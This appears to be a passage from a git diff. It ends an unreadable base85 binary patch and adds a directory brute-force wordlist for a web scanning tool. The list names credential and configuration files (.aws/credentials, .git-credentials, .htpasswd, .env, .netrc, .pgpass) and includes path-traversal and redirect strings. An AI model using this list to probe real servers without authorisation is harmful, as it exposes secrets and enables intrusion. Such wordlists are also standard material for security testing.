zm+3vVE?E9^Q)4*+u2-3#VgFXX%62b8#qy11QC%EqN#ql<@d+RKUqQb^)=L`IlrJF>
za%Hl{sZ{t2j5zrbThc)6(^ukE_N+Q&TLsKWd`skHW?K_&YRh^3ZP!o*B{S&r1oTWG
z00D*zClQTw1K4(nITSk?9QnK#NS&xEk$XT$^j9RloIiM$iHX${qnKvk5~BOQua@%E
z_k(XU;EjjMLo!LAGeEk#o;DhufN~p`SQx?DqKKmx9i}9wahxD+hbY_RO}N^6wZq~n
zvlAU%*r2uIZ*&T*DBem%3^O0hu^0VDpo!V`t1_eoXhs2FQLO=Dd-gqi8Thc$)iwV*
z=F_Ku>c)UmO+t<WkB=2M;fwBNu*;7sMTuhsvtls<O$k6${eBFRj217T9(XFT?((1m
z*S1U^U!*$$h7P(vP}3zyia|YSnA)ANvCIZahkElybUQ97UWCg5JO{}&plnbOVemEz
z{iOo;!r7WdL;~Z0jyDv_zJ{p4z-X|HULaDZ>w{@nh@3C3dMHGQD9RzGBz5x=)~4?X
z<@`0|h_U7nJucBaF&4L(kGg?m15pvNh7*Y#zSG$vTG54tSq0b`L`@pDo4=!KIXbii
z<hx+)s0get_tEDZyyLgpN9bDwJ|k@PN!hf|r<>6S2Liv~!VFf3N^xHoU~x1It*)J(
zfcVxzD8nDUY^%+@THX^&(X>EU^|yd@R5_v)0pVB@!(f}sCtx>+pJn=n)Q(_%!AgWI
z*L3mX!NQj3UoD#`oA;2DK*De;zz23&_a-&9Kk=ps*xz@c9jyOw91290HQfj<D6rPe
zrAJ3ATR!eo_x4}V8?|*=swiZIVkooM82+!us?TivyPB7s!i$V7!mENg0{%rIqQPy|
z5i<U`$s~kM+n)o+K9b6TEKK!n^VKCc5k9FgRW}F|_}Mh_RU2URmWz=~%Su^$E3B__
zD=JCk;Ci()WH*bn-i|=qbxOSYPEfSsx(!U>iV8*Jc!)0n(jP70-9&xl2ILUePo4uh
zL^m`xW0x<QmB~zzkOnisyz7d*l9f@%(Ex->;_hV_MApd#R$y!f4!Lu-0;4X=rQGL<
z!Hv~V7RZbo&e{jxlAZd#z&!Ed{9w@zr%iua7lY(dklb3}Y%u64=#a%<q!$%?^aX>P
z9w2b>-@1W(h86e3fPASY&D^Rv)gzi+1RNfgG|ZneyWhxO^m!)F?9hws6@4el7NFE$
zu^mn!@iQjLHVgFK9rsvvc;`+Xa4!zLkMT8cCCyYYKe~JMH}GQ)oxPy}i}DpncwfR`
zZ5V0WCC^kw3=@#|OqAA|%aS5x;@0ytc<|icrxydP@dv30seytJE$o`pq)wo=7YI+n
zJI&tKvWFR_H)wW_Qz=M8Uebt&b}5dc64BZ#isskI3fn?IQ{v;w8SDK)VR6J;n5WHI
z2xS0sJzb392b)NEwXoe<sde}gcA`XEB{eH##6f<iN7LFjWtx>r&$uB&SmS_K{--zZ
z@X^>j3eV4Fmo|#i{6$=EY$a6=ZD9=ue$Z>+X9A9x9j|+^1$-^V>?D8qR9yT-&v1x2
zAW$Eh+46v}AgU-1FNWVl&O0OW1d_mqhKBr0h8n6f?RM{!oJrLNcN-6o_8JT`aZwhm
zfFl60x(NifNs)sxJcGz06naFuAILb(K#z*;5D;&v=}>tbU|}^&Iw-HB7_4PV0OWEQ
zn}rMsft(IuWStQKAkRU}tTP}0<vRq-Le9C_?IEjuhHDetO^T4NPXDKbk3C5EfRWKY
z-3}3L8zT|j;IGXFzEq$CtQR!GIlL0QTni~|LUVPjl{9C}*k0w*rc|d>aCTnBmu8@I
z0;2CUS+8T>)c!01=mreP9Vh<ok>vctZIPmx03rBRqB1pJdB)Vn^^`-xLt;N}FMJ1p
z$mQ+F2x9!)2GyA_<xs<cN<j~{#OZ(uux;(+X<*k^QebicBffRgGYKNA&5b?=Ft_!D
zp(46Bi*_J>GIbQ0MJ7PlowUBzjT`|FvIXVkhMwLhZn>d4tUbZK-)z`XV^s4-D)gA&
zW&%|91)=c&_ub`A$uIuo00E_FOPi=tama8*gMc4#wu8(m4^Et0L&0<y^HG*)P%C<I
zR0GP5l5M3l4GF6bT-lZxtWkg969=<D6BUgtg0Um_qUf4(30^jlpzJQttm>kV-7g7h
zIPk;(9X@)a9k5VjOc`Ct5F#Y8vwJV$#~_Tzd?%emmnJEivWz2&kP+cex8I*%yYs$&
z*diVDezCa^&KBiptY2&cqSZyKicEm|T1^$;(w?Qk@Gn$!IYz9YD${^XC1viI?J5%s
zch&aDK8UHlAPv6TRyKxIu@K%4<`g%E3YynDo`63kkV>N(Q#|l>7-XRlG`7<pUmZt}
zLREsZUNbG3FW913C2F*iX>wy{aHc(@mAo_xf>nPl_>tqT1~|1CB=0fQ!e=YMGl4?q
zAES4}nP}=ib=VI_T5q$;!zKHmTT=hbXR*UD>_8);;z@@V=Zqbtr6}WcBK<xd6yq`M
zLm?v5l|SA!afYOE<QYzhB)~K`U}_c|5X<5$LH2K|-;O4tS4pi)o1wBwS9B&OJui}5
z5@3qsS=gw!Y>KXtDkF(BHicxitCI?J2|2NyCU$8>;E~`T+0XaEiR+)<kpm|1glswJ
zvrbu&)NSn#)pQ`lj!s=czo`tw!TM+^P8xP;okdviu2>WZ$j2t3AcQ3>-GULta{>IZ
zhI=&pH*#0*=(789%<bkkOqD=HBichiHixCNp#@oap$XKtiCg3v(HbS!QeQeMT4?d}
zEzy~#v6#<QcDRvL<;3~(I#Fj%OH(7qIf*@_;i-Kp0yJvkP0xX>BQIhVQydLTcuHn^
zaJfk$e`2M}kP(#o;%~dOe2dm5Z3LMt0WN^>>@MS^2K?C67Iy4}`*`Gs0!XSMiTtry
z$$nrEbK|N<quqhXM$70KRtLVdJs}Rn8Vz|DdJxA0K=VjoH8jh1DBL_U5a|lkODouh
zodO-p8UQ4TWUuBP$Y_UCHTO9#_d)QP3QMq2p#2tOPJYNzTnm6r*V%x3qEsz~v3$7a
z@A<!d%%D1e#x82Xf!QZoq8zm*Gfw$+g-Fw6={8J2x(%D}=<bsuh@_;Q-QVyEm?0Of
zStg1z!G0GJKVhaA-lbfMt;Fa@!7&ry_vihapz~?xXUm>t2UdXEenLdKojbq^UaODH
zIoZ(Z3Ef=ngf5v{;a6hO)AeCmU+Q8wj2H`s!F0k+K;vK<u^7owl4FZ|h_1u-JJhjO
zT#yMT>!uNaY_YDMIIKj-2cSyd^r1cCVF}(z@cH1aEd>UF9BiR%)jbwdp#t5KSp&@!
zmc~@?x7MD$*!2*fV>pPfH6cdnS_Ei4C!s%k*U#A0>?2&EUaelFIQv&N$}Sr(S${;|
z0ku9@CC^1)bS6yG<8R&MXzeYG`I3m#e|LI+XK}U2Z(<Sgah8s;RLZP&<ci`}GBS*W
z*|13z>TdML61x-7KAG~9t2j2$REfmB$6_;;(ZRsf7<R5T4ZoQjgG31+kjO`3+>>?<
z0Ej6^pG_bW#B5MiRS4680QzL~u5{Cvuj8!oiqSTgN!tSe(ZjPkVIYw>hnR-r*hnVX
zG=LE9N?+qSd5yeV*r1S2?1tc!K0elvLPG(z@@O}BO#EP$aGJp6)-6|opDQN-TY+Nm
zBIcOBe-Ii4DibV{WFxf(xZWh*jk7Vo(D~}P*)h1f;HCA(S@Ke(Tv7y-uan-mtGe{Y
zKB>gNC+WCt*|;gnc(V32im)coHLl#`cu8uJeD=rmYMUTlLx;<Aq!pn01k>KpC9a(N
z>(p<<zZVF=)~q3^6O#fNT!bLZ2^q$2o-qGVe@xoEdPPKKb1IsuUboklGo;`()CNg4
zNgB9uw;k9Zll8Eaa9G_iM!(wuA@y2Cw8ofYA%!I&VR6ID0A4@VX(Dw23C6Es9du`y
zob#Y<X>0m9gI!>PFO}jeWU^bgr(!{v7qlaAl))7)V!LiW%c&@6;U0K-j9<<@X)Sga
ziBzLk2_z5Qx;?;Cs+JyJ5042>mt#NvZ+EA6l!Qx1!>bS-zYq;>0P^L|qv<PY6K;6(
z1!9B$rC_lKpAL7kKx9@F*wgukA_NLV%_I;Efo%2_t*Tf&=?`EeAZI%OuG<;nEl6NM
z)Xm<qGYJ?PXiP+yH$Cq}K)WI}$d8(fun}hF$nmo1a||0Kb5_kqi|6#*=gI8Wrx0^_
zjnJsqzV<Zi@H#IV5lu~|K5^rGH5*;X_fiIPqwvP_d**%`zQB|~QM_d>6IBF)%ktHz
zB_JkJG(;GVvr`|$gNZ3h=`ySZ23js~rTpeosj|lk=N!9A6$&uzw*>&`tXOC=sr-()
zEcBqc$9<uWUZah}jk;}EF1$?<@FubCWRCoXM4C|UpJUh*=8#pU012(=TV2ov?kB-J
zY(MlUASgvP$-0bk0ey&rP!tQiCEII5KomA4GSz?}hgl?umy^8pL<hG#bogN8tK{*u
zH-i~`-C+snhn!kO6Axg^<oZ<IG^Et)F19}S)E??zP17(5<-e7~Wvu^y)(R&b0~3Q7
zmHm&F#~Q&ds9hg!5dYW?vlPn%1@b3Gz+sdxHoiIs?ftugb*F$-oC8R>-=RPU$8$Bs
zjp(Df^aNz(pTog%b{BDct%hr9n6TC5sGNHt3+WaQzYTqE>Ma|uB&(*KWBwsjr$~@>
z6JJbk(0<i(e_Q;!Pt1WQGeR=R#4U45B2x`qI*LWFpyTS%mZ30f=77)ZI?*28K(b1)
z<0sOZb2i+{>z{r5hAfeoFTz1#FTvnUyol(AfEpZ3JK1eH;DznckG`Z0UyZ;5!L@;!
zPEfB&cv!1F+CGd2M?vbF1<3Klb217tNLBUACiEkLw;+?q`3{y}*o<3vs&;M1M-ucA
zgfL|g%<S;v^@OAq*i*?ug~~cTwcpr_;e*;<T{P=!zas5b7n*$)+*#=@m^q{403@fe
zsNfB05sl65%@KDMA_3X1f}_{H{of>MRAY=mvRZrLacHBW)3s8xk|`pj_dpJe^`xT&
zr?AoV6?;(j?OmhD)T}9)l<d(F|Fr`N79tzK^}Pe(GPq3BcZJv61?vr1zyFNr7G0$K
zR(6i>x4l9*#my^)pw-3V-aP?Bbl9A94|D{88GszGR<8Spr^Np{DAmK!{$=wOr=+Q>
zu5u&D#;w*R8XLIUWl>muo;OdQ6;8Xsu?0^OnqmT>t46nu)-PlSA@nZRK<`LJ=Ai17
z6Nt8M%6EJV%(~0GBmIhG&iskJ>^x=k58BW|4yMuC6<VM*t-yJ8>3p{z%AcEKz@kNG
ze%}I=QiQr>8W%o2v+}ax$x3{l4S{wmFb5uDQu<8PO3LM!b4`U~%^$d_;^<32N7^%|
z2J5y~tiV3MX%r^HKul3E+7NNG7(zabzu<g`%}b+}6*l58%ZRXvfsySxeZwZ2-Khd?
zAz_tB{Y1qCtGoL1C&MG4lsNr9?5IWx8D6Js5)$FCfbRRh3O+Kqk^1Lw?gGrqP11y_
zdwtuaVxg8Djh~P00_1YeX&O7{nPX(K$pCiakY^S?xn}#wco|&-=K}}|oo)Q^WO?*G
zUf!hD83JC6uiW_oGfjH(=23AQ*RVBsfH6tqV76sVi%60;(l`>4PbgrBEReHTg5#yT
z?}eP~Tf=jFG9YcG76Bz+MDbSqs#O;^kNxAXFG1*aZ-K!9i|f}$ypQ$8f&UfTMp@QS
zE&PMBG=!VIHt%6c#W?-;%f(eVIsyRs^NnR6YeXp85rSI-Kik*+$*cJFZVmt?m;Ruq
zUy_9OBoyx0cwb^Yf|3p@mxOW1L;Z9#UC|NSmA{3!$p^LN8wsPlyLyJJj}Fs4!S+Zb
zMSGp@vec2T_WK@*kjo5asY@k3S!+FbWCO4uT(Yb<pRfomN+K;k85p{nsOffXA?O+E
zst1CfIbq@hArPrRDL<HtPWoZOU*T?S)>b~Yad2`H^&U21D-!a>&Tkyjx|QG&>^5d!
z`Y9G3D8|`1b#Vk8_eVjthXalGU3Whrd2<i>>ByK((9=5rW;GMV98yjqq;ziBYD;P9
z+r<T-lh<O-u@tv;v3c=y{l|s|Af9bG7Bc=@u@8GAW#2Pdw=$MYbPrOMo}xL6qmk7K
zm$+$GfA>hblw@Tn6y`T3zYKuRObt_qP^Hs2Pfn=3iH|@~Z2(%XD_}4BOWJ-)FO_c)
zl{Zr8d()U}fpG0~Z`DYuEC7N)=@*qIx8wQL#oxJY*p<m!amy<J!QDAAtOX-txN!)&
z@eYunNM!gw6d=`Z)QvCz7*?M>b+Ccr>+!wYWP$(IQ-HG23v#&cEV?)#DVKRxbf4Jg
zr{dHs1f74&*N#u~48CaT+6a1c=Oo2hLi21++z}kgda4aJF^G`_<UVqHqZO%BH=_{`
zF*NmN9zu`9c>`y$Og$Gc8cP#CoH_i&o#u)isN4dS#PvfBxWB$4h{#Y1Cg;VKCe<~w
z)x_=0&qJ4*gL`ngyeYc$|NJ;)n?n+`44S3Zjxb%f2zmVt=9V(SO<V5vJjc1~Y%s+0
zaw~B?+5zBcra%EBUzcC7AqPt;P@v`ldPWdhQ7H%hCYBy*A|-**PNa;@X+Cy?%Fsgb
zWLDVV$kGwy6jhUJm*-0?NlbwhQg2#>Zd^PueWO8xbkPBvMNXp*kIzPNK28BDUf5YA
zZ)7icgMz_&b~?^!wJT+fr<h>d=gc4={)N9&vQTe$&_Kexg|tOV*mxJ_@({TnknJ3q
z)GXA+j^-4Nteh6PAoU#V{&G<q6P6ZlyNrOzjBKR18|oVXE;SlfRjZvld2^U=4Vg=i
zY)9Y$)x3uOh&MdJ$xzC%72llT^AN9QPfk5S<S?x2lJO(HZwBhQ$)s(JkokpjBcU4X
zj&iqz8r9>$Ej8EieFpYQ;*)<c49K@BHfe5D7Q&q02dT$p<vN;`8LtzFsk8zywf%1n
zgQ;Og*!5K0J&2vwNzo5MPz1p~TC*VKuMhe6_AfpgO&Rc$3uc#QYr>Y!b<Koknl5R8
z(v`gNK(b{TsKlc>)Fq5jvgSr+@JZMQuf@UC92ceKxUNp?lhX(?SXJgdK(cH!;*|ba
z8SJ+%ye6bdX+DsDNy_Yw@xHV)`)+prAEmM}eT0UTu*H*_{~rI099{4-m)d|Y%^Yt|
z;dOfas<B)PM(e5j5glyHDqss*y%LotHs0{C<d>r&*GK%SjG#%G-3Wn+m|TY*ZschG
zL#vGv)o3-_km#d%8}kums->31nY1;6Y2)%pw2cbCP!{O^yw<?}G~~Te-kz1USEA#?
zvf@!2_>;A6=39Z+bUS4!GNbl0LRFE@W@qRV&C5>+BaeF4FYb<DBPqhCPS-=DchDbL
zU%!J^P%3?RlBx_@Ry{O}{7R_tSw$ztf`#B&ue_p?g4g2*%=Bh!EAue5pISQzWr7+#
zDUe6eRdcXnq}#KLQMYK7i=TsOIhsZn=^+-p%qQe<{Z}z9`=WoFhR5%SqtaK{>-~<W
zc9rGJ#|*(r@9xoh{zN@jiMTv6S?v|~f5S$)FnhE64`2$wUgJMQa~a=Y0dlUHNT>F8
za0a)20bzx=0tv1jQM{=~MePnL3j_dEbS<f8e}})(QB>%@qIP3hMhYz;nULxMxx|uy
zq#dq54pp<}8tHy}1lu`qlyl2vsgJY}Pt1l%d4W!;L5uWs<r(XMp0Z>)GoPEgaMxJ{
z1G9Ic4L&P_Ci4$Vx3T>tT|raXWdUr>5S82tq^DO5eI9l7g38n0s2E^}F6^4%NK(Hm
z$7cxZ#3nfI<pc{6>5zofnnfQnWV&P6K~oq4!Jo)o?}x|_vsa!mBE%(_WRx9*WnbhO
zu+;lYfIb{O*XqZ{1<DUkpVGO8g`iP!oqT&lTol{<R1|I#u%t&8bqdGus-nJ9w@%_z
z!4;-(XhD~SvBFFZMYU9RketZY0u>kjthWv+=!V}nx}|Srh%TB%G2g3FoA#5RO}hzN
z-34)WSo<a}bxYM|JHmUOa0}CI^pI+QhNb~MP%dGvddbj)s5o^3sN}l(nrE5lR^;?{
zjcfdg5mGYF3KrfI$-3^c4>|1!{pton{E8foSn^v*4NuRKveHi_GAST~1<lf|__pE(
zK|=4dpQa_et$(~hODP3~9Y;{Go3d;lB{U1^MW|U;Jy=vg!^Q<LG$D@|dQ>jz0a`KT
zlB5L@V(Pah-@mr%M9>Q{ltj5>hrS#TB!js?Bh4f}9kQbg^bTj6BILH9C3tTux{qL8
z9x5IAHV*#G?Zv7x`_8nM(yBt#BPsDv19?6)O9I_KR_MX~D(g|@@9@kX;d=!xkGR&Y
z*k}#WtEn=bUJZWs7NS;RDE3j93{)L6?iokcE!b2z_9=>#=S5BY=z}O@7!icyMb#>Q
zAhPBF<ht0SVw?b|Wf7AiYf`p3`SxJhh_rkuMkjb<NFJT$is?e~m+*8qS6eZvvZ5{u
z!fRuIZ-BZ1v#<W1P+c^)6s>{J2Y{_On8@>}56y>+uxZLR#@x?V3dIem;YRF5(_sM(
znr<k(ZN4D<$(qJVHRPH`-Bbs{IkV@P0}CIQ*tnNDOhG_R87RRgN}70uA4)uVq7i+O
zyZF~Ub+zX8+Aal3qmP4_*8svI(xi1(o*pyI%;iSp#M&v^4#s|FnGn{{4rfQuGx@AK
zG6-OXF6#}WQ1Cdw3e!X1se8z^E#<HpUMAS=ABa<N@%MTKH}+XkwRV+)CQ^#`=$)&n
z;<G_BkMH2T2|_OG2w?9XQr}1zp;Qr=6|YD-ON5{m1N?>vTpborGgo@6r*6^l1B+Af
z<Z&{$Ow8)p7SQdZwGgY!oBUD#YLG2sZ!ez_SJE#V$rZMS8|B!L%g33CA3~#+FZ*LU
zff&dby&+tj%PH!DtM*pP<D}YMD^SFMk;dcM#|L~LZjL>bTL|%{mA<E&G;r9$=)*}W
z@^)C_Q}4{3sJBRLwYE%(Z~>1gjEJUX-Yle(Fs+#XA&v9qW}`*R!5+jPHmVcEI`7ei
z*s<=EntO)^&P!k>Dd1^i!Rd2Qr>BL{P^o>H01T1PrjP*A*K%|z0^uHf(-aOq_AW4U
zFQ*AUfs9w{p8$6gJHTNR8vn1S0_W-iL-}JrmfkSzG12H-bb4FUg!@`XO<|jtgZV)G
z)v*0?tD9r8b%CDgpr5NGzWX~{{?ZS?jK4isC|;HUk52C#&M?(*N^RSa&#}hDFC+Tf
zgKzVl{DitjHtwzb4jv^#1U4%;Zd~=$a{X-zS7R8EvTP>niTT`&GskvG-2I-Pj4#N|
zo@n`Wxb5I*co^HYi(J3CFKRR*^xfwtD>Am<6~bq%#`{g4KSbc5L1b|9?QI)v1t>&F
z)ypHlKSYNena{5x#OfmkjNEp@g}kNMg5|ocL+c|?hS+!a|1j@gF$7ux9Nq#~B~Zec
zBU~ref8Ks`ah=^0!R`=X9dX^2Y)IdtQIjl%kSjwdscEL65fVi8ftR>~jxQGFTPsO4
z0<PO2V@;2+osNJTu2TLAt2d++*GJ;Nc=0mRTr#|n`>oTTE_6YmqirMT6P&GuomTJm
z-HFk{X1gRGJg+vx&Tm)68fto&F<)DQsTukcyI_$D2vyUVvR0;6Qr@txk<4A!J%YZ&
z8MddcS25Q`NUg6wIEh|ih>PQs$ejGp9^?G1VxL}pAw8B2bt5Hp-eWnR720Ev+uC)4
zM{4VF2dQu=if#}I3{XiFSFuJU-`+l7COV<G;=g8Iq=&h`;Kr36Fo(eR-`Yq`1vJ}h
z9Nn@?bpkz&bW5#3glNiIZW8!yB>dRrV18NDgW%`15Kejs>yA->O<G0KLH%u+q<&gV
znt%|JDfoXy>(J!Hc-pe4luYTR?e1T<R*g#J74+^xZkWDz+DkI$T5SHi+>XLe7r#u<
zXRJBbCFWoX<)J2EX9Jl|;hw{G1_FItX1D9iluL96KN~peK*iZCX5DGjLY}OKo}M>Q
zPKGs5=P*+vUCCA|hU08cpL3cLC*sUXwkb>#2LNd6?@(k!+)OyN3*ZIjQ3fSzX;kb#
zo0$v_fG`~Cu0-Ss<Qra_mw&i5?zQu}TA|9Z+w1o8a8<85$sD37C*lSXdIM^+ih8fc
z5l;6S<>Pt-ZN0&Q(EX4~M*)Md=S7uHU<F}#Yn@7$zo#1R8;Q1v7ti#YKN3JP4RD*j
zwc;J(cM()y`P7q#bKvEuznd?Esk1V$tahN-5<1a38pShRj9fPOW!+`G*Cf;{vC~4_
zXU-urfit+45G79`Ht$pRdDoaM+gh<<z&Y@Y6B>Jsb*DVG0|(iD+zTZqG+vUY^qvgZ
z!A)e$JZ_9d?u2>pZdog<;Cik{AzO4MKaF<ORE?JlWhP+{u)$MbN-1Zq;$}jMC$yy}
zG)jw%^Cf~C(uc+!3+YGZp-ygz{&CTRAGEaCzm!lA26OJ@$43Z|jh>d<SZQ%B*PRn1
zwM~7Ce)DhI$KV51+531}VawI76yI6UsVLCmpsV>?Mdf5g+`HOY`xY*Q?u)u1&nCc!
z8AjpnTHX4{Cq;o}6m!r=3(;6wEsp@Kp#q$|R>5|WboX~eq3FrRu4E|&zHCdllw}YD
z!#_soTYA6a%Tvh0%x_nI-<OCfH9$f#IWm()wUrY4-H|5kwAF<Ng>^E<N^p8X0n^R)
zvsH-=ipf+M$voECXn)${9I3P6zt|wKkAx!7vg@)s$y>rHz&dM!g(Q#_BVaoZCpLq8
zb+_$^?3Eo5*D9mrco4&x4pMxwRtDgrzB>@Odvw9wFX~*){b1>m^r%#9I(+^HkL+;0
z7=b*3h1zmO`D@^o^GFbCC#^c;*Q7#YVQodmDl{Sw1^g0)eYw1!YK-zSswon5F%q}%
zob)iz1Kn?7Z7V?EBv>9kY;(qQS=O;P4agWLAspV;MGJO0YVP|DQ55h9&d5>nm9jX^
z(k=<v8h>P!0><xhM7A0zocQojhX0;72hEad&|OB7jTI!HHjh+OZCxDZXinGd&gHC*
zRudWiAGEounxY=%Ub;z6H0tp-H#GPehdN+<l_9mLL?fNwQUN#DWz|t&*N3>2A9fG3
z4?Z5ZHw_Qnug1VSik4OpI}47_Zi9tmDz0egJM4JV;P?zny4<g@2=yTJvnjKwOUd&5
z3$fb<OQB&-Jn}nLd3jCXzjmP0gA;ZM#7nvJ71CXNdyH_fhPaLJR0UP_>krhO`Qu<O
zw~sQ4h9veZ=u}ZUi)bI$xZ6D4&Uc0?9R0Aj32wDlUR#N$Cp~4YeVkFKHJeJQ*;xi_
z9<=JfCyua_pS#{vL0O8LDNJ<FK_BK(Hl>2xv2&_Z61^Y?wJv)chzkV*$lJ%Q)VoXW
zInXaP^;!yo`0OuF^G-1>M8KXzXK14e1RB$}UqLUAM*VW&Fn(Wgf}#aAKKU{ukUmB9
z*;{VQ0MPYs4eS^cSS=i_+op|1hajDB#*Elhm!(5~KqTly>urh?s2;)*ta$JZc0%*B
z0{|q&Gx2Ns^q8-58gAQyA|QcZWxkyk&p}eU3-;a*YS_t_P*U(0E`0)Ue0i3;fAh&M
z*j})U8z}Sk$nv_^1)b{e(I>O~Ir>rtPMK*6H-C=%8f(HEK?8qtZp(D9*wt;7N&Wtt
zt2RxOtE>qidR-2TprF)5WreB!*dq=iPoUEo$$_SYb=ky+>vJO;#1MvW^20fAQY03y
Zh=K{pS}_`?${6p^MIAIOjRp=Cc~R$RqBj5l

literal 0
HcmV?d00001

diff --git a/db/directory-bruteforces.txt b/db/directory-bruteforces.txt
new file mode 100644
index 00000000..aec7f97a
--- /dev/null
+++ b/db/directory-bruteforces.txt
@@ -0,0 +1,5339 @@
+!.gitignore
+!.htaccess
+!.htpasswd
+%20../
+%2e%2e//google.com
+%2e%2e;test/
+%3f/
+%C0%AE%C0%AE%C0%AF
+%ff/
+..;/
+.7z
+.access
+.addressbook
+.adm
+.admin
+.apache.env
+.apdisk
+.AppleDB
+.AppleDesktop
+.AppleDouble
+.apt_generated/
+.architect
+.aws/credentials
+.axoCover/
+.babelrc
+.backup
+.bak
+.bash_history
+.bash_logout
+.bash_profile
+.bashrc
+.bower-cache
+.bower-registry
+.bower-tmp
+.bower.json
+.build/
+.buildpacks
+.buildpath
+.buildpath/
+.builds
+.bundle
+.bundle/
+.byebug_history
+.bz2
+.bzr/
+.bzr/README
+.c9/
+.c9revisions/
+.cabal-sandbox/
+.cache
+.cache/
+.canna
+.capistrano
+.capistrano/
+.capistrano/metrics
+.capistrano/metrics/
+.cask
+.cc-ban.txt
+.cc-ban.txt.bak
+.cfg
+.cfignore
+.checkstyle
+.circleci/
+.circleci/.firebase.secrets.json
+.circleci/.firebase.secrets.json.enc
+.circleci/config.yml
+.classpath
+.cobalt
+.codeclimate.yml
+.codeintel
+.codekit-cache
+.codio
+.coffee_history
+.compile
+.composer
+.concrete/DEV_MODE
+.conf
+.config
+.config.php.swp
+.config/
+.config/filezilla/sitemanager.xml.xml
+.config/psi+/profiles/default/accounts.xml
+.configuration.php.swp
+.consulo/
+.contracts
+.coq-native/
+.core
+.coverage
+.cpan
+.cpanel/
+.cpcache/
+.cproject
+.cr/
+.csdp.cache
+.cshrc
+.CSV
+.csv
+.CVS
+.cvs
+.cvsignore
+.dart_tool/
+.dat
+.database.env
+.db.env
+.db.xml
+.db.yaml
+.debug.env
+.deployignore
+.dev/
+.devcontainer
+.directory
+.django.env
+.dockerignore
+.drone.yml
+.DS_Store
+.dub
+.dump
+.eclipse
+.editorconfig
+.eggs/
+.elastic.env
+.elasticbeanstalk/
+.elb
+.elc
+.emacs
+.emacs.desktop
+.emacs.desktop.lock
+.empty-folder
+.env
+.env.backup
+.env.bak
+.env.copy
+.env.dev
+.env.dev.local
+.env.development
+.env.development.local
+.env.development.sample
+.env.docker
+.env.docker.dev
+.env.local
+.env.new
+.env.php
+.env.prod
+.env.prod.local
+.env.production
+.env.production.local
+.env.remote
+.env.sample.php
+.env.staging
+.env.test.sample
+.environment
+.error_log
+.eslintcache
+.eslintignore
+.eslintrc
+.espressostorage
+.eunit
+.external/
+.external/data
+.externalNativeBuild
+.externalToolBuilders/
+.fake/
+.FBCIndex
+.fetch
+.fhp
+.filemgr-tmp
+.filezilla/
+.filezilla/sitemanager.xml.xml
+.fishsrv.pl
+.flac
+.flowconfig
+.fontconfig/
+.fontcustom-manifest.json
+.forward
+.ftp
+.ftp-access
+.ftppass
+.ftpquota
+.gem
+.gfclient/
+.gfclient/pass
+.git
+.git-credentials
+.git-rewrite/
+.git/
+.git/config
+.git/HEAD
+.git/index
+.git/logs/
+.git/logs/HEAD
+.git/logs/refs
+.git2/
+.git_release
+.gitattributes
+.gitconfig
+.gitignore
+.gitignore.swp
+.gitignore_global
+.gitignore~
+.gitk
+.gitkeep
+.gitlab
+.gitlab-ci.yml
+.gitlab/issue_templates
+.gitlab/merge_request_templates
+.gitlab/route-map.yml
+.gitmodules
+.gitreview
+.gradle
+.gradle/
+.gradletasknamecache
+.grunt
+.grunt/
+.gtkrc
+.guile_history
+.gwt-tmp/
+.gwt/
+.gz
+.hash
+.hg
+.hg/
+.hg/dirstate
+.hg/requires
+.hg/store/data/
+.hg/store/undo
+.hg/undo.dirstate
+.hgignore
+.hgignore.global
+.hgrc
+.histfile
+.history
+.hpc
+.hsenv
+.ht_wsr.txt
+.hta
+.htaccess
+.htaccess-dev
+.htaccess-local
+.htaccess-marco
+.htaccess.BAK
+.htaccess.bak
+.htaccess.bak1
+.htaccess.old
+.htaccess.orig
+.htaccess.sample
+.htaccess.save
+.htaccess.txt
+.htaccess_extra
+.htaccess_orig
+.htaccess_sc
+.htaccessBAK
+.htaccessOLD
+.htaccessOLD2
+.htaccess~
+.HTF/
+.htgroup
+.htpasswd
+.htpasswd-old
+.htpasswd_test
+.htpasswds
+.httr-oauth
+.htusers
+.hypothesis/
+.idea
+.idea/
+.idea/.name
+.idea/caches
+.idea/compiler.xml
+.idea/copyright/profiles_settings.xml
+.idea/dataSources.ids
+.idea/dataSources.local.xml
+.idea/dataSources.xml
+.idea/deployment.xml
+.idea/dictionaries
+.idea/drush_stats.iml
+.idea/encodings.xml
+.idea/gradle.xml
+.idea/libraries
+.idea/misc.xml
+.idea/modules.xml
+.idea/scopes/scope_settings.xml
+.idea/Sites.iml
+.idea/sqlDataSources.xml
+.idea/tasks.xml
+.idea/uiDesigner.xml
+.idea/vcs.xml
+.idea/WebServers.xml
+.idea/woaWordpress.iml
+.idea/workspace(2).xml
+.idea/workspace(3).xml
+.idea/workspace(4).xml
+.idea/workspace(5).xml
+.idea/workspace(6).xml
+.idea/workspace(7).xml
+.idea/workspace.xml
+.idea0/
+.idea_modules/
+.ignore
+.ignored/
+.import/
+.influx_history
+.ini
+.inst/
+.install/
+.install/composer.phar
+.installed.cfg
+.ipynb_checkpoints
+.jekyll-cache/
+.jekyll-metadata
+.jestrc
+.joe_state
+.jpilot
+.jscsrc
+.jshintignore
+.jshintrc
+.jsp
+.JustCode
+.kde
+.keep
+.keys.yml
+.kitchen.local.yml
+.kitchen.yml
+.kitchen/
+.komodotools
+.komodotools/
+.ksh_history
+.laravel.env
+.last_cover_stats
+.lein-deps-sum
+.lein-failures
+.lein-plugins/
+.lein-repl-history
+.lesshst
+.lia.cache
+.libs/
+.lighttpd.conf
+.listing
+.listings
+.loadpath
+.local
+.LOCAL
+.localcache/
+.localeapp/
+.localsettings.php.swp
+.lock-wscript
+.log
+.log.txt
+.login
+.login_conf
+.LSOverride
+.lynx_cookies
+.m2/settings.xml
+.magentointel-cache/
+.mail_aliases
+.mailrc
+.maintenance
+.maintenance2
+.mc
+.mc/
+.members
+.memdump
+.mergesources.yml
+.merlin
+.meta
+.metadata
+.metadata/
+.metrics
+.modgit/
+.modman
+.modman/
+.modules
+.mono/
+.mr.developer.cfg
+.msi
+.mtj.tmp/
+.mvn/timing.properties
+.mweval_history
+.mwsql_history
+.mypy_cache/
+.mysql.env
+.mysql_history
+.nano_history
+.navigation/
+.nbproject/
+.netrc
+.netrwhist
+.next
+.nginx.env
+.nia.cache
+.nlia.cache
+.node_repl_history
+.nodelete
+.npm
+.npmignore
+.npmrc
+.nra.cache
+.nrepl-port
+.nsconfig
+.nsf
+.ntvs_analysis.dat
+.nuget/
+.nuget/packages.config
+.nyc_output
+.old
+.old.env
+.oldsnippets
+.oldstatic
+.org-id-locations
+.ost
+.packages
+.paket/
+.pass
+.passes
+.passwd
+.password
+.passwords
+.passwrd
+.patches/
+.pdf
+.perf
+.pgadmin3
+.pgpass
+.pgsql_history
+.php-ini
+.php-version
+.php_history
+.phpintel
+.phpstorm.meta.php
